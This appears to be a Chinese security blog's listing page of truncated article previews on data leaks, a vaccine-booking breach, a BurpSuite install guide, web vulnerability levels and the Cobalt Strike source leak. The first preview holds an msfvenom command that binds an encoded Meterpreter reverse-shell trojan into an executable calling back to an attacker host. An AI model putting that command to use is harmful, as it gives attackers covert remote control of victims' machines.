桑云信息安云
2021-07-27
具体思路第一步构建恶意文件1.指定一个可执行程序 捆绑木马msfvenom -p windows/x64/meterpreter_reverse_tcp -e x64/zutto_dekiru LHOST=[IP] LPORT=3333 -x webshell.exe ...
桑云信息安云
2021-07-27
漏洞是指一个系统存在的弱点或缺陷,系统对特定威胁攻击或危险事件的敏感性,或进行攻击的威胁作用的可能性。按照危害也被分为高、中、低三种。低危X-Frame-Options Header未配置查看请求头中是否存在X-Frame-Options Header字段http://google.com会话Cookie中缺少secure属性(未设置安全标志的Cookie)...
桑云信息安云
2021-04-13
0X00 一次艰难的安装经历折腾一下午BurpSuite终于折腾好了,折腾的过程中发现市面上大多数的安装教程都非常点到为止(说白了就是看不懂),于是就自己写一篇分享给大家,同时也是我学习过程中的一次记录,如果在安装过程中有任何问题,可以在公众号后台给我留言,我看到会一一解答PS:本篇教程仅适用于windows用户,Linux和Mac用户请自行查找教程&nbs...
桑云信息安云
2021-04-10
九价HPV疫苗市场需求量巨大该疫苗虽已于2018年5月在国内正式获批上市但仍是“一针难求”不少女性甚至男性为了尽早接种不惜花重金到私人中介处购买“九价HPV疫苗”一些不法分子因此动起了“歪脑筋”。2021年1月,南京警方接到某妇幼保健所报警称,其微信公众号hpv疫苗接种预约系统上出现两个异常预约,有两名用户在非正常预约时间段完成了线上预约,获取了疫苗接种资格...
桑云信息安云
2021-04-10
近年来,全球信息安全问题频发,一些大型网络企业也深陷其中,如被数据泄露缠身的Facebook,4月3日又被曝超5亿用户数据泄露。几天之后,职业社交网站领英也被爆出信息泄露事件。4月6日,据Cyber News报道,有人在某黑客论坛发帖称拥有5亿领英用户的数据并会对外销售,然后提供了200万条记录作为样本以供验证。黑客首批公布了4个文件,并表示已经通过爬虫抓取...
桑云信息安云
2021-04-10
近期,证券时报记者深入多个数据交易千人QQ群发现,各行各业的用户隐私数据被肆意贩卖,触目惊心。不时有人在群里喊单,“出一手GM(股民)、WD(网贷)、BJ(保健)信息,拼多多、淘宝、京东一手网购数据,需要数据的联系我……”这些数据按照行业划分被明码标价。甚至还有采集个人信息的系统展示,号称可以采集全国老板的私人联系方式。还有五花八门爬取数据的软件,“爬”上网...
桑云信息安云
2021-04-10
这个事情也是引发了相当大的震动。毕竟这个up主的影响力太大,认识的同学自不必说,不认识的可以想象一位每个投稿阅读量都在一两百万的up主是个什么档次,几乎是头部顶级网红up主了。先说个明星的事情,邢菲。前天她的热搜也是令人非常的惊悚,有个男的持续跟踪她,人肉她的各种信息,包括下榻的酒店,路线等等。目前猜测此人可能是所谓的私生饭:官方已经报警:这是邢菲自己发的,...
桑云信息安云
2020-11-19
据媒体报道小米公司在本月17号发出全员级别的通告,通告中小米称人工智能实验室实习生私自映射内网端口至公网。当然比将公司内网映射到公网更严重的是这番操作导致不法分子入侵小米服务器,目前这名实习生已被小米开除。小米并没有透露服务器被入侵是否造成其他重大安全影响,但小米在通告中提到相关涉案人员已经移送司法处理。这里的相关涉案人员肯定是包括...
桑云信息安云
2020-11-16
最近几天,有人称在GitHub发现了一个名为“Cobalt Strike”的文件夹,据称是渗透测试工具Cobalt Strike 4.0的源代码。CobatStrike是一款基于java编写的全平台多方协同后渗透攻击框架,常被业界人称为CS神器。Cobalt Strike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马、office宏代码生成...
桑云信息安云
2020-11-11
随着国内大量的单身女性一步步激增。《2019年一季度单身人群调查报告》报告显示,单身男女首次相亲年龄不到23岁,近半数95后拥有相亲经验,平均相亲5次能遇见爱情。由此可见,中国相亲新趋势:首批95后开始相亲,相亲年龄呈现出低龄化的趋势。单身经济崛起,什么行业最受益。“各类诈骗”,毕竟只需几台电脑随时随地即可操作。成本低,见效快。不要忘了,我们国家可是人口大国...
电商老板转行开卡业务员,疯狂盗取公民“人脸信息”被宁波警方抓获
2021-07-27
